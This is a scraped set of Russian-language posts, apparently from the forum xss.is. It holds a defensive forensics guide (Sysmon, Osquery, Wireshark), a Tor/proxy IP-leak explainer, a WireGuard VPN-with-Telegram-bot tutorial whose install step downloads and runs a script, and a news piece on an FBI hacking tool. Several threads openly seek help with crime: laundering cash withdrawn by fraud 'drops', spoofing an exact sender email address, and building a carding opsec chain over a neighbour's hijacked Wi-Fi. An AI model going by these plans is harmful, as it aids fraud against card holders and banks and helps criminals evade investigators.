Также установив утилиту Autoruns , мы также можем мониторить процессы в системе и информацию об них.
Скачать: https://download.sysinternals.com/files/Autoruns.zip

В таблице мы можем увидеть работающие процессы в системе , а также мониторить их. У нас есть такая информация как:

-Процессы и под процессы(процессы запущенные другими процессами)

-Входы в систему

-Запланированные задания (процессы)

-Работающие драйвера

-Запущенные сервисы

И многое другое….

Ищем последние сетевые подключения

Если мальварь использует для подключения прямую или обратную оболочку доступа , это можно увидеть анализируя сетевой траффик.
Как мы знаем , сетевые подключение видны при анализе входящего и исходящего сетевого траффика устройства. Для анализа внешнего траффика будем использовать инструмент Wireshark.

Скачиваем Wireshark:
https://www.wireshark.org/download.html

Запускаем инструмент:
Sudo Wireshark
Или запускаем ехе файл

Выбираем адаптер для захвата траффика:

В поле фильтра вводим ip.src == <IP> || ip.dst == <IP>
Теперь мы можем мониторить исходящий и входящий сетевой трафик от устройства.

Анализ сетевых пакетов:
Для анализа содержимого пакета , кликаем на него в строке перехваченных пакетов.

Также мы можем использовать утилиту Sysmon Simulator , для просмотра последнего подключения.
Команда ./SysmonSimulator -eid 3 выводит информацию про последнее сетевое подключение.

Ищем следы применения зловреда

С помощью связки таких инструментов как Event Viewer и Sysmon Simulator , мы будем искать следы использования мальваря в системе.

Event Viewer:
Изучите документацию по использованию инструмента https://learn.microsoft.com/en-us/shows/inside/event-viewer

После ознакомления, профильтруйте все последние изменения в системе , это может быть:

-Изменение, перемещение, создание файлов

-Изменения в настройках учетных данных

-Изменения в регистре системы Windows

Sysmon Simulator:
Пересмотрите все последние события в системе с помощью инструмента Sysmon Simulator.

-eid 1 : Process creation

-eid 2 : A process changed a file creation time

-eid 3 : Network connection

-eid 5 : Process terminated

-eid 6 : Driver loaded

-eid 7 : Image loaded

-eid 8 : CreateRemoteThread

-eid 9 : RawAccessRead

-eid 10 : ProcessAccess

-eid 11 : FileCreate

-eid 12 : RegistryEvent - Object create and delete

-eid 13 : RegistryEvent - Value Set

-eid 14 : RegistryEvent - Key and Value Rename

-eid 15 : FileCreateStreamHash

-eid 16 : ServiceConfigurationChange

-eid 17 : PipeEvent - Pipe Created

-eid 18 : PipeEvent - Pipe Connected

-eid 19 : WmiEvent - WmiEventFilter activity detected

-eid 20 : WmiEvent - WmiEventConsumer activity detected

-eid 21 : WmiEvent - WmiEventConsumerToFilter activity detected

-eid 22 : DNSEvent - DNS query

-eid 24 : ClipboardChange - New content in the clipboard

-eid 25 : ProcessTampering - Process image change\

-eid 26 : FileDeleteDetected - File Delete logged

Создание криминалистической цепочки.
Поиск источника появления вторжения

Почти во всех случаях , источником атаки есть или заражение системы через скачивание и запуск файла , или уязвимость в системе
В случае со скачиванием файла все понятно , анализируем откуда где и когда был скачан файл , но предаем большое значение ресурсу откуда был скачан файл. Анализируем регистрацию домена , узнаем контакты и информацию об хостинге, а также парсим полезную информацию про ресурс. Эта информация нам пригодиться при создании репорта.

Также анализируем ехе файл который спровоцировал установку мальваря на систему:

-Анализируем процессы запуск которых спровоцировал мальварь

-Анализируем размер и дату создания файла

-Реверсим мальварь

В случае с уязвимостью в системе , которую использовал хакер для проникновения в систему , нам нужно анализировать логи , с помощью инструментов Osquery , Sysmon Simulator и Event Viewer а так же других которые предназначенные для криминалистики и Incident Response , про использование инструментов с практикой я писал выше.

Поиск исходного узла получения данных

Исходный узел – это часто IP адрес или место куда попадают логи , или шеллы зараженных устройств. Исходный узел мы можем найти при анализе сетевого траффика , анализируя отправку сетевых пакетов на удаленный хост , именно информация об этом хосте может быть полезна при создании репорта.
Анализировать сетевой траффик мы научились в главе про реверс мальварей.

Также исходный узел можно определить при анализе коннектов (Обратных или прямых оболочек к системе).
Это мы делали с помощью инструмента Osquery:

SELECT * FROM socket_events

SELECT * FROM listening_ports

SELECT * FROM process_open_ports

Навыки и применение Osint

Применение навыков и тактик Osint это очень важный нюанс при создании криминалистической цепочки , так как надо уметь искать информацию которая связана с информацией про вторжение в систему.
Например знания криминалистики или сбора информации даже про тот самый сайт/источник откуда был установлен мальварь.

Создание репорта с найденной информацией.
Учимся сдавать доклады

Сдать доклад (Репорт) – это очень важный и ювелирный этап пентеста или в нашем случае расследования. (Кто работает в конторе по Кибербезопасности поймет =) )
Пункты которые должны быть описаны в репорте:

Введение:
Укажите дату и время инцидента, а также основную цель репорта.
Опишите общую информацию о системе, в которой произошел инцидент, включая версию операционной системы, используемое программное обеспечение и прочее.
Описание инцидента:
Предоставьте подробное описание инцидента, включая тип инцидента, его область (например, взлом, вирусная атака или утечка данных) и последствия.
Укажите, как было обнаружено нарушение и какие меры были предприняты для его остановки.
Анализ инцидента:
Опишите методы и инструменты, использованные для анализа инцидента, включая Sysmon, Event Viewer, Osquery и другие средства.
Укажите, какие действия были предприняты для анализа системы, обнаружения следов вторжения и установления причины инцидента.
Найденная информация:
Предоставьте детальную информацию о найденных следах вторжения и аномальной активности. Это может включать:
Информацию о вредоносных файлах или программном обеспечении, обнаруженных в системе.
Логи событий, отображающие подозрительные активности, необычные сетевые подключения или попытки несанкционированного доступа.
Информацию о скомпрометированных учетных записях или утечке учетных данных.
Рекомендации и предотвращающие меры:
Предоставьте рекомендации по устранению уязвимостей, которые были использованы злоумышленником.
Укажите рекомендации по улучшению безопасности системы, такие как установка обновлений, использование сильных паролей, регулярное обновление антивирусного программного обеспечения и прочее.
Рассмотрите необходимость обучения сотрудников по вопросам кибербезопасности и созданию стратегии реагирования на инциденты.
Заключение:
Подведите итоги инцидента и предоставленных рекомендаций.
Оставьте контактные данные ответственного лица или службы, чтобы с ними можно было связаться для дополнительной информации или поддержки.

Входные и выходные данные при процессе.

Входные данные – это данные которые мы получаем перед расследованием или в начале.
Выходные данные – это информация которую мы нашли и до следили при анализе системы.

Примеры входных данных, которые могут быть записаны в репорте:
Журналы событий (Event Logs):
Входные данные включают записи из журналов безопасности, системных журналов и журналов приложений, которые содержат информацию о событиях, произошедших в системе.
Пример: Журнал безопасности содержит информацию о неудачных попытках входа в систему или необычной активности пользователей.

Логи системного монитора (Sysmon Logs):
Входные данные могут включать логи Sysmon, которые содержат информацию о действиях в системе, таких как создание и удаление файлов, изменение реестра, сетевые подключения и другие активности.
Пример: Лог Sysmon показывает создание и удаление подозрительных файлов на системе.

Информация об угрозах и интеллектуальные данные:
Входные данные могут включать информацию о новых угрозах, известных уязвимостях и обновлениях программного обеспечения, которые могут помочь в анализе инцидента.
Пример: Информация о новой вредоносной программе или известном методе атаки.

Выходные данные: Выходные данные - это информация, которую мы находим и документируем в процессе анализа системы и расследования инцидента. Вот примеры выходных данных, которые могут быть записаны в репорте:

Обнаруженные угрозы и аномалии:
Выходные данные включают информацию о конкретных угрозах, обнаруженных в системе, и аномальной активности, которую удалось выявить.
Пример: Обнаружение вредоносного ПО или подозрительной сетевой активности.

Информация о компрометированных аккаунтах:
Выходные данные могут включать информацию о скомпрометированных учетных записях, таких как имена пользователей, IP-адреса или другие детали.
Пример: Обнаружение аккаунтов, которые были использованы злоумышленником для несанкционированного доступа.

Изменения в системе и следы вторжения:
Выходные данные могут включать информацию о конкретных изменениях в системе и следах, указывающих на вторжение.
Пример: Изменение настроек системы, создание или удаление файлов или записей в реестре.

Рекомендации по мерам безопасности:
Выходные данные могут включать рекомендации по усилению безопасности системы на основе обнаруженных угроз и слабых мест.
Пример: Рекомендации по обновлению программного обеспечения, усилению политик безопасности или проведению обучения сотрудников.

Итоги расследования

Закончили мы расследование… я надеюсь что вы набрались новых знаний в теме криминалистики и тактики Incident Response.
Мы научились использовать инструменты Osquery , Sysmon Simulator и Event Viewer.
С помощью них , мы научились искать следы взлома , мониторить систему а также реверсить мальвари установлены на взломанной системе.

С вами как всегда был маленький Gufi! И это еще не конец статей про криминалистику , это только начало…

Всем добра!

Автор: Gufi

Сделано специально для xss.is!

"модель OSI" нормальным языком

ID: 676533bbb4103b69df3719eb
Thread ID: 96698
Created: 2023-08-27T19:44:35+0000
Last Post: 2023-11-08T15:32:49+0000
Author: Dread Pirate Roberts
Prefix: Статья
Replies: 19 Views: 1K

я решил развеять распространённые заблуждения о торе и носках.

подавляющее большинство статей о "модели OSI" содержит примерно такую картинку:

которая является ерундой, так как не сортирует протоколы более высокого уровня относительно используемых протоколов более низкого уровня.
правильное описание модели OSI, которое почти никто не объясняет, выглядит примерно так:

© https://networking.ringofsaturn.com/Protocols/sevenlayer.php

немного изменю эту картинку для наглядности, и добавлю пару популярных программ:

(хз что за "r.utils" в оригинале)

интересное:
DNS запросы по умолчанию используют UDP, и повторяются по TCP, если ответ не влезает в 4 килобайта.
BitTorrent по умолчанию использует и TCP, и UDP.
Telegram чаты работают по TCP, но звонки работают по UDP.
Tox по умолчанию использует и TCP, и UDP.
Windows RDP по умолчанию использует TCP, но может использовать и UDP.

теперь обратите внимание на правый столбец: есть ещё один широко используемый протокол, в простонародье называемый "ping". пинги идут ни по TCP, ни по UDP, а по ICMP.

теперь ещё раз дополню картинку, чтобы стало понятно, почему одни программы красные, а другие зелёные:

- Tor может проксировать только TCP трафик , как и прокси типа socks4.
UDP трафик могут проксировать только прокси типа socks5 (и то не все), и частично I2P.
пинги не может проксировать ничто (кроме VPN, но это уже другая история)

что из всего этого следует: если вы проксируете какой-то софт с помощью torify или proxychains , то проксируется только TCP трафик. если этот софт вдруг решит подключиться куда-то по UDP, то в лучшем случае подключение не сработает, а в худшем - подключение пойдёт с вашего реального IP адреса! я лично сталкивался с этим при использовании proxychains, но примеров софта не помню.

также если этот софт выполнит команду типа "ping unique-specially-generated- domain-123456.telegram.org" то на удалённом сервере также засветится ваш реальный IP.

решение: пользоваться VPN (а лучше цепочкой из VPN и socks5) - так как VPN работают на втором или третьем уровне модели OSI, то они способны проксировать и TCP, и UDP, и ICMP трафик.

всем спасибо, все свободны.
автор я, распространять разрешаю только при указании ссылки на этот топик.

Разворачиваем свой VPN-сервер с оплатой через Telegram

ID: 676533bbb4103b69df371a0e
Thread ID: 89305
Created: 2023-05-30T20:41:33+0000
Last Post: 2023-09-08T12:47:28+0000
Author: baykal
Prefix: Статья
Replies: 4 Views: 1K

В этой статье я покажу не только как сделать свой собственный VPN-сервис на основе WireGuard, но и как его настроить, чтобы им смогли пользоваться все твои друзья и знакомые. И даже, если пожелаешь, закидывать тебе свою долю за хостинг, пользуясь простым ботом в Telegram.

Возможность шифровать трафик и проксировать его через другие страны сейчас настолько необходима, что я не стану тратить твое время и в очередной раз перечислять все случаи, когда без VPN не обойтись. При этом большинство пользователей выбирают готовые сервисы: либо бесплатные, но ненадежные и со встроенной рекламой и слежкой, либо платные, но дорогие в сравнении с хостингом.

Чтобы сделать свой VPN, требуется поморочиться с командной строкой. Гикам вроде нас с тобой такое занятие в радость: я, не имея никакого опыта, поднял такой сервис за один вечер. Друзья стали спрашивать, нельзя ли и им получить такой же быстрый, надежный и дешевый сервис. Однако копаться с настройками никто из них не хотел.

Я долгое время генерил и раздавал готовые конфиги, но потом это стало надоедать. Тогда я задумал создать собственное решение с возможностью быстрого деплоя, администрированием через Telegram и временными квотами для пользователей. В этой статье я расскажу тебе о нем подробнее и поделюсь всеми нужными для деплоя исходниками.

ПОЧЕМУ ИМЕННО WIREGUARD?

Я выбрал WireGuard из‑за его скорости в сравнении с OpenVPN и IPSec. Ты только посмотри на эти графики.

![Пропускная способность (мегабит в секунду), тест iPerf3](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31222%2Fperfomance- test-throughput.png&hash=a8a9659a5f1e1c87a9e0d45eb11d38ff)

![Время отклика ping](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31221%2Fperfomance- test-pingt.png&hash=b1e92f3872d78366de61c8e8376388e8)
Похожую статистику показывают тесты Protectli и [Entrostat](https://blog.entrostat.com/openvpn-vs-wireguard-network- performance-tests/). В Linux WireGuard работает на уровне ядра, что дает дополнительный прирост в скорости.

В WireGuard не такой большой выбор асимметричных шифров, как в OpenVPN и других протоколах. Но это одновременно и плюс: меньше поверхность атаки на протокол.

АДМИН-ПАНЕЛЬ И БОТ В TELEGRAM

Итак, как для пользователя выглядит общение с моим ботом? Начнем знакомство с главного меню.

![Главное меню](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31217%2Ffirst- start.png&hash=dd0b32c54631745d2ea4f9163fd2f30c)
При первом входе пользователь получает приветственное сообщение от бота и тестовую подписку. В конфигах бота ты сможешь сам задать все тексты и параметры вроде времени, на которое предоставляется тестовая подписка.

В главном меню пользователь может ознакомиться со статусом своей подписки, продлить ее и получить конфиг с подробной инструкцией для подключения, а в разделе «Продлить» — приобрести подписку на определенное время.

![Выбор варианта подписки](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31219%2Fbot- pay-1.png&hash=2f1e9f6600a535a4d7ccffb1b2ed788a)
Оплата выполняется онлайн, через сам Telegram. Соответственно, мы можем выбрать любую платежную систему, с [которой сотрудничает Telegram](https://core.telegram.org/bots/payments#supported-payment- providers).

Я планировал использовать для оплаты Qiwi, так как там есть открытый API для создания счетов и не требуется становиться самозанятым или ИП. К сожалению, недавно в Qiwi приостановили выпуск необходимых токенов и не сообщают о сроках возобновления. Однако в исходниках ты найдешь вариант админской панели для Qiwi.

После того как пользователь выбрал и оплатил подписку, ему приходит сообщение об удачной оплате и сразу же обновляется информация о его подписке.

![Подписка на месяц оплачена](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31218%2Fpayment- okey.png&hash=166f876164f8527ac71c697100be5b2d)
В разделе «Как подключить» пользователь может получить свой конфиг для подключения к VPN-серверу и подробную инструкцию, как настроить WireGuard на своем телефоне и как им пользоваться.

![Раздел «Как подключить»](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31216%2Fhow- to-connect.png&hash=12470e9f853fe2ebab13d0e057983c9c)

И наконец, самый главный раздел — «Админ‑панель», к которому имеет доступ только админ бота.
![Главная админ- панели](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31215%2Fadmin- panel-main.png&hash=a9ad13ba8e27e0c1ee6ac7f06578fc4c)

Раздел «Вывести пользователей» позволяет получить список всех пользователей системы или только пользователей с оплаченной подпиской.
![Раздел «Вывести пользователей»](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31214%2Fshow- users.png&hash=8fca7d33f7761090bfe8c2fa2e314100)

В разделе «Редактировать пользователя по id», введя Telegram ID пользователя, мы можем добавить время или обнулить его (то есть забрать подписку).
![Раздел «Редактировать пользователя»](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31213%2Fedit- user-by-id.png&hash=bac98d66ccabb3e87b6f3dca1cf18a4f)

Раздел «Статичные пользователи» может понадобиться для предоставления доступа к VPN пользователям, которые не зарегистрированы в Telegram. В этом разделе мы можем создавать статичных пользователей, удалять их и получать конфиги для подключения.
![Раздел «Статичные пользователи»](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31212%2Fstatic- users.png&hash=0ab4958f66a99d8de91bce8e64d75883)

Вот и всё меню. Но в боте еще есть уведомления пользователей об окончании подписки. Все тексты уведомлений можно править в файле JSON.
![Уведомления](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31211%2Falert- function.png&hash=acf51dbb8bcea170bbfefa0b259c13f4)

НАСТРОЙКА БОТА

С тем, как выглядит бот, я тебя познакомил, теперь покажу настройки и скрипт, который разворачивает и настраивает WireGuard в пару кликов.

Начнем с конфигов бота. Первый конфиг называется config.json, в нем содержатся основные настройки бота.

Code:Copy to clipboard

{ "admin_tg_id": 440887487, "one_month_cost": 120, "trial_period": 2700, "UTC_time": 3, "tg_token": "********:**************_**********", "tg_shop_token": "56456767:TEST:343455" }

admin_tg_id — Telegram ID админа. Узнать свой ID можно у бота userinfobot.

one_month_cost — цена в рублях за месяц подписки. Минимальная сумма в рублях должна быть эквивалента одному доллару, но, как показала практика, стоит выставлять немного больше, чем актуальный курс доллара. Курс, который использует Telegram, можно узнать на официальном сайте.

trial_period — период пробной подписки. По умолчанию установлено 45 минут, то есть 2700 секунд.

UTC_time — часовой пояс в формате UTC. Бот будет учитывать его при выводе времени. По умолчанию установлено UTC+3, то есть московское время.

tg_token — токен бота, полученный от @BotFather.

tg_shop_token — токен магазина в Telegram. Нужен, если мы хотим принимать оплату. Если оставить это значение пустым, то бот просто не будет отправлять форму для оплаты и, соответственно, оплата онлайн будет недоступна.

Как получить tg_shop_token? Переходи в Telegram к боту @BotFather и пиши /mybots. Затем выбирай нужного бота и переходи в раздел Payments. Тут ты можешь ознакомиться со всеми доступными платежными системами и узнать, как их подключить. После подключения платежной системы возвращайся в BotFather. В разделе Payments должен появиться наш заветный ключ.

![Как выглядит токен для онлайн- оплаты](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31209%2Fexample- pay-token.png&hash=eb608b4e682cb7cf1b57b34047980ad5)
И последний конфигурационный файл хранит в себе текст сообщений, которые бот присылает пользователям. Сообщения могут быть оформлены с применением HTML- стилей Telegram, а как ими пользоваться, можешь посмотреть в документации.

Code:Copy to clipboard

{ "hello_message": "<b>Почему стоит выбрать Obi VPN?</b>...", "trial_message": "Чтобы вы смогли оценить наш VPN...", "how_to_connect_info": "Ваш конфиг для подключения к VPN...", "success_pay_message": "Оплата прошла успешно...", "ended_sub_message": "Ваша подписка закончилась...", "alert_to_renew_sub": "До конца действия..." }

Думаю, вполне понятно, какое сообщение за что отвечает, поэтому не будем останавливаться на этом и перейдем к деплою.

ДЕПЛОЙ

Скажу сразу, что скрипт я разрабатывал на Ubuntu и тестировал только на Ubuntu 20.04 и 22.04, поэтому не могу дать гарантии, что он заработает на какой‑то другой разновидности Linux.

Установка выполняется одной командой:

Code:Copy to clipboard

sudo wget https://raw.githubusercontent.com/Obi0Wan0Kenobi/ObiVpn/master/Wireguard-installer-with-Adminpanel.sh \ && chmod 774 Wireguard-installer-with-Adminpanel.sh \ && ./Wireguard-installer-with-Adminpanel.sh

Эта команда скачивает установочный скрипт, дает ему права на запуск, а затем запускает.

Когда увидишь приветственное сообщение, приготовься заполнять обязательные поля, они нужны для нормального функционирования нашего VPN. Значения некоторых параметров скрипт автоматически получает из системы и предложит лишь подтвердить их корректность или изменить.

Dobro pozhalovat' v ustanovshchik WireGuard!
1.Vvedite publichnyj IPv4 adress: 185.200.190.143
2.Vvedite setevoj interfejs: ens3
3.Vyberite port kotoryj budet ispol'zovat' WireGuard [1-65535]: 49584
4.Vyberite pervyj DNS server kotoryj budut ispol'zovat' klienty: 1.1.1.1
5.Vyberite vtoroj DNS server kotoryj budut ispol'zovat' klienty (opcional'no): 1.0.0.1
6.Hotite li ustanovit' srazu Telegram bota(1 - Da, 0 - Net): 1
7.Vvedite API-klyuch ot vashego Telegram bota: *************
8.Vvedite klyuch ot vashej platezhnoj sistemy: *************
9.Vvedite Telegram-id administratora: *****

Вводим публичный адрес IPv4 (получить его можно, выполнив команду ip -a в терминале или посмотрев в панели администрирования хостинг‑провайдера).

Здесь требуется ввести сетевой интерфейс (его тоже можно узнать из вывода команды ip -a, чаще всего это eth0, ens5 или что‑то в таком духе).

Порт, который будет использовать WireGuard (по умолчанию скрипт выставляет случайный порт с 49152 до 65535, но ты можешь указать любой).

Основной DNS-сервер, который будет использоваться при генерации конфигов для подключения (по умолчанию устанавливается DNS Cloudflare).

Второй DNS-сервер (по умолчанию Cloudflare).

Выбираем, хотим ли устанавливать панель администрирования или нет.

Вводим API Token нашего бота, полученный от BotFather.

Если не вводить API Token платежной системы, оплата в боте работать не будет.

И последнее поле, которое нам надо заполнить, — это наш Telegram ID, который можно узнать у @userinfobot. Пользователь с указанным на этом шаге ID станет администратором бота и всего ресурса.

После заполнения всех полей остается только нажать любую клавишу, и установка начнется. В конце скрипт напишет WireGuard Installed.

Теперь заходим в нашего бота и пишем команду /start.

![Проверяем бота](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31207%2Finstall- finish.png&hash=5497491b76b9cdec8184ff2f0f6e261a)
Бот нам ответил, а значит, установка прошла успешно. Теперь мы можем запросить у бота создание конфига, который затем импортируем в клиент WireGuard на своем устройстве и попробуем зайти на сайт 2ip.ru для проверки работоспособности VPN. Как видишь, наш исходный IP, местоположение и прочие параметры изменились, а это значит, что VPN работает отлично.

![Проверка работоспособности VPN](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F2f71a7fef2668075dab93a6a7c16fc42%2F31206%2Ftest- vpn.png&hash=7cf7dba94099eeeda321912049585677)

ВЫВОДЫ

Мы разобрались, как буквально за пару минут развернуть собственный VPN-сервис с удобной панелью администрирования. Ты можешь использовать его, чтобы поделиться ценным сервисом с друзьями или даже попробовать немного заработать.

Напоследок — пара советов по выбору хостинга. Хоть WireGuard и работает быстрее других протоколов, не стоит забывать о влиянии расположения дата‑центра. Советую не оплачивать VPS сразу надолго, а сначала сравнить разные регионы, дата‑центры, провайдеров и выбрать оптимальный вариант.

Исходники ботов доступны на моем GitHub: есть версия с оплатой через Telegram и с оплатой через Qiwi.

Авторы @driver0black и @W0lFreaK
источник xakep.ru

Отслеживание номеров купюр

ID: 676533bbb4103b69df371a29
Thread ID: 71726
Created: 2022-08-15T17:30:46+0000
Last Post: 2023-08-15T16:53:48+0000
Author: arsarsov
Replies: 24 Views: 1K

Вопрос - логгируются ли в банкоматах(банках) номера купюр, которые выдаются с пластика и какие кладутся на пластик ? Возьмем ситуацию, была раскручена цепочка вплоть до карты дропа, который обналичил деньги и отдал их Вам на руки, какова вероятность, что придут гости, если закинуть этот нал на свой пластик ? Примем в условие, что сумма не настолько велика, что бы заинтересовались органы по статье ухода от налогов, а к карте пришли именно раскрутив цепочку до дропа и выдачи нала.

Анонимность, безопасность email

ID: 676533bbb4103b69df371a47
Thread ID: 74295
Created: 2022-10-13T15:34:17+0000
Last Post: 2023-07-05T06:21:19+0000
Author: kommercheskiy
Replies: 14 Views: 1K

Доброго врeмени суток. Стоит задача отправить письмо с определенного адреса электронной почты. То есть адрес должен быть не похож, а именно тот который нужен (не должен отличаться даже на символ). Буду благодарен за варианты. Всем хорошего дня.

Андроид + Wifi Router. Вещевуха. Нужна помощь в создании безопасной цепочки.

ID: 676533bbb4103b69df371a55
Thread ID: 66217
Created: 2022-04-26T19:49:42+0000
Last Post: 2023-06-04T21:31:44+0000
Author: Dolph
Replies: 23 Views: 1K

Основная задача подключаться с андроида по wifi к роутеру в котором будет домашний usa ovpn конфиг (карж, вещевуха, возможно банки/кредит конторы). При всем этом нужна реализация хорошей безопасности.

Есть 2 ноута, адаптер alfa + самодельная wifi антена, 1 роутер OpenWRT.

Я озвучу свой вариант и следом задам вопрос, но и хотел бы услышать ваши варианты.

1. Подключаемся к wifi в соседний дом с помощью адаптера альфы
2. Инет с адаптера альфы идет на ноут.

Вопрос! Смогу ли я зашифровать трафик (который идет с соседского wifi) на ноуте и передать уже шифрованный трафик с ноута на мой роутер owrt в который в последующем я прокину домашний ovpn usa для подключения андроида к роутеру.

Поясню Цепочку : Соседский wifi - Ноутбук - Роутер owrt (ovpn usa)

Цель : андроид + роутер = вбив

Для безопасного соединения я собираюсь использовать :

1. whonix gateway (tor) возможно придется развернуть свою tor ноду
2. 2 ovpn в 2 разных странах на арендованных серверах за Monero. (VPS или VDS что лучше для безопасности?)

Надеюсь этого будет достаточно, а может и нет. Нужа ваша обратная связь, за ранее огромное спасибо за помощь

Более просто и безопасный способ передачи файлов

ID: 676533bbb4103b69df371a6a
Thread ID: 86701
Created: 2023-04-26T07:39:14+0000
Last Post: 2023-04-29T07:47:41+0000
Author: michail
Replies: 22 Views: 1K

Очень актуальный вопрос.
От чего зависит вскроют вас или нет. А если вскроют, то когда )
Потребовалось мне передать файл из под виртуальной машины на "железную" ОС другого ПК (прямой доступ к ПК)
Способом создания общей папки, для передачи через вирт. экран такое не годится! Почему так решил? Теряется сам смысл виртуалки.
Вдруг у вас где-то зловред! Он может быть как на гостевой, так и на основной ОС. Если сделать общую папку, то равносильно тому, что все ваши длительные способы конспирации обнулились в секунду.
Вопрос по обмену опытом, кто что предложит наиболее простое.
Есть вот такой вариант, который сразу отметаю ---> шифровать файл, некая почта, скачка Тайлсом
Это очень огромный путь, по этому он не интересен. (и не известно на кого работают Тайлсы))
Второй вариант Токсами. Но у этого варианта есть небольшой косячёк - Токс имеет малую защищённость при работе с основной ОС в отношении палева IP Как минимум на передающем ПК нужно включать режим - через прокси
Тогда как-то что-то более менее. Такая себе передача. Но нужно согласится, что намного удобная передача, чем посредством разных почт.
А что вы може предложить? Забыл уточнить, что каких либо зомби серверов в наличии нет. Файлообменник так же пойдёт, так как это аналог пчтовых серверов.
Примерно нужно какой-то программой. Но нужно что-бы передавалось в шифрованном виде, как у Токс
По Gnunet интересует. Кто нибудь передавал файлы с гостевой ОС из Gnunet ?
И что-бы воду в ступе не толочь предлагайте варианты которые сами юзали. Предположения разные как-бы не интересны, так как будут засорять тему.
Сейчас будет первое место занимать Токс сервис. По удобству и конфиденциальности.
Кто предложит лучше?

(перевод) ФБР не разглашает свое причастие ко взлому сайта ИГИЛ в даркнете

ID: 676533bbb4103b69df371a80
Thread ID: 80063
Created: 2023-01-16T11:41:55+0000
Last Post: 2023-03-23T14:21:26+0000
Author: r_as
Prefix: Статья
Replies: 4 Views: 1K

Каким-то образом ФБР смогло получить IP-адрес человека, который якобы посещал dark web сайт, связанный с ИГИЛ. Минюст США препятствует обсуждению этого вопроса в публичном пространстве.

Согласно судебным документам, изученным Motherboard, юристы правительства США препятствуют попыткам раскрыть, каким образом ФБР удалось получить реальный IP-адрес предполагаемого посетителя веб-сайта ИГИЛ в даркнете.

Речь идет о Мухаммеде Момтазе Аль-Азхари, которому в мае 2020 года было предъявлено обвинение в попытке оказать материальную поддержку ИГИЛ. Согласно официальному обвинению, Аль-Азхари 14 мая 2019 года якобы несколько раз посещал onion веб-сайт, на котором размещена «неофициальная пропаганда и фотографии, связанные с ИГИЛ». В силу того, что веб-сайт хостился в Tor, владельцу сайта или третьей стороне должно было быть сложно определить реальный IP-адрес любого посетителя сайта.

Тем не менее, ФБР это удалось. Оно установило, что Аль-Азхари якобы посещал сайт с IP-адреса, связанного с домом бабушки Аль-Азхари в Риверсайде, штат Калифорния. ФБР также установило, какие именно страницы посещал Аль-Азхари, включая раздел о пожертвовании BTC, раздел, посвященный военным операциям, проводимым боевиками ИГИЛ в Ираке, Сирии и Нигерии, и еще одну страницу, содержащую ссылки на материалы медиа-подразделения ИГИЛ. Это было бы невозможным без применения ФБР какой-либо формы слежения или использования Аль-Азхари другого способа посещения сайта, позволяющего определить его IP- адрес.

На данный момент, в документах, недавно представленных Министерством юстиции, юристы не хотят раскрывать, как агентство получило доступ к IP-адресу Аль- Азхари, и блокируют обсуждение этого вопроса в публичном пространстве.

"В ходе расследования правительство отказалось предоставить любую информацию, связанную с его операцией в сети Tor", - написал Самуэль Э. Ландес, адвокат защиты, работающий над этим делом, в заявлении, опубликованном во вторник.

Эта новость свидетельствует о том, что Министерство юстиции продолжает тщательно скрывать использование хакерских инструментов, несмотря на то, что они становятся все более популярными в целом ряду уголовных расследований. В результате, такая засекреченность может привести к тому, что обвиняемые не смогут получить доступ к информации о том, как они были идентифицированы, и не смогут эффективно оспорить правовую основу таких действий. В некоторых случаях прокуратура не могла добиться вынесения обвинительного приговора, поскольку сохранение в тайне инструментов расследования оказывалось более важным, чем победа в суде.

В ходатайстве, поданном во вторник, Ландес пишет, что государственные прокуроры потребовали, чтобы его ходатайство о предоставлении дополнительной информации было помечено как "особо конфиденциальный документ". Это обозначение используется для документов, которые могут представлять интерес для разведывательной службы враждебного иностранного правительства, и будь они использованы иностранным правительством, это, вероятно, нанесло бы значительный ущерб, говорится в заявлении Ландеса. Последнее заявление Ландеса

это еще одно ходатайство, в котором он просит суд пересмотреть решение о присвоении такого обозначения его предыдущему ходатайству.

Ландес указывает на то, что сетевые методы расследования (NIT) являются лишь эвфемизмом Минюста для обозначения хакерских инструментов, и далеко не секрет, что они применялись ФБР во многих случаях на протяжении многих лет. По его словам, он также нашел доказательство, поданное по другим делам с аналогичными вопросами и находящееся в открытом доступе в Интернете. Несмотря на общедоступность этой информации, правительство попросило суд рассматривать ходатайство как документ повышенной секретности в принудительном порядке, пишет Ландес.

Министерство юстиции отказалось предоставлять какие-либо комментарии.

В других случаях Минюст решил вообще прекратить добиваться вынесения обвинительных приговоров, вместо того, чтобы предоставить обвиняемым больше информации о том, каким способом они были идентифицированы.

11 января 2023 года
Источник: https://www.vice . com/en/article/z34dx3/fbi-wont-say-hacked-dark- web-isis-site-nit

Криминалистика компьютерной памяти на практике. Как эффективно анализировать оперативную память (2023)

ID: 676533bbb4103b69df371a83
Thread ID: 81314
Created: 2023-02-05T15:22:25+0000
Last Post: 2023-03-06T21:05:50+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 6 Views: 1K

